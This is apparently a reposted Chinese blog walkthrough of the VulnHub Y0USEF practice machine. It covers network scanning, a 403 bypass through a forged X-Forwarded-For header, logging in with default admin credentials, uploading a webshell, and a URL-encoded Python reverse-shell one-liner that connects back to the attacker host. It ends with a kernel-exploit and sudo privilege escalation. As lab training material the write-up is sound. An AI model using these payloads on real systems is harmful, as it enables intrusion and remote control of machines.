Y0USEF靶场实战

admin 2024年2月23日04:07:07评论14 views字数 880阅读2分56秒阅读模式

https://download.vulnhub.com/y0usef/y0usef.ova

Y0USEF靶场实战

Nmap

nmap -sP 192.168.106.0/24  #对自己的靶机网段进行存活探测,获取靶机地址nmap -T4 -A -p- 192.168.106.131  #对目标进行全端口扫描

Y0USEF靶场实战

WEB

对目标地址80端口进行目录扫描,通过bypass403发现以下地址可以绕过访问请求头中添加:X-Forwarded-For: http://127.0.0.1http://192.168.106.131/adminstration/

Y0USEF靶场实战

Y0USEF靶场实战

通过对登录处进行账号密码爆破用户名:admin 密码:admin可登录成功通过访问页面,发现文件上传点,尝试进行shell上传成功上传shell文件,可进行命令执行

Y0USEF靶场实战

Y0USEF靶场实战

通过搜集发现系统中存在python,直接python命令反弹shellexport%20RHOST%3D%22192.168.106.128%22%3Bexport%20RPORT%3D4444%3Bpython%20-c%20'import%20sys%2Csocket%2Cos%2Cpty%3Bs%3Dsocket.socket()%3Bs.connect((os.getenv(%22RHOST%22)%2Cint(os.getenv(%22RPORT%22))))%3B%5Bos.dup2(s.fileno()%2Cfd)%20for%20fd%20in%20(0%2C1%2C2)%5D%3Bpty.spawn(%22%2Fbin%2Fsh%22)'

Y0USEF靶场实战

Y0USEF靶场实战

三、提权

内核漏洞提权,提供搜索内核版本直接利用exp进行提权

Y0USEF靶场实战

Y0USEF靶场实战

通过信息搜集发现存在3个拥有bash权限的用户home目录发现发现user.txt文件,获取到一个以下用户的账号密码user : yousef pass : yousef123

Y0USEF靶场实战

Y0USEF靶场实战

Y0USEF靶场实战

ssh使用yousef用户进行登录,发现用户存在sudo权限,成功提权到root权限

Y0USEF靶场实战


原文始发于微信公众号(渗透笔记):Y0USEF靶场实战

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日04:07:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Y0USEF靶场实战http://cn-sec.com/archives/2496829.html

发表评论

匿名网友 填写信息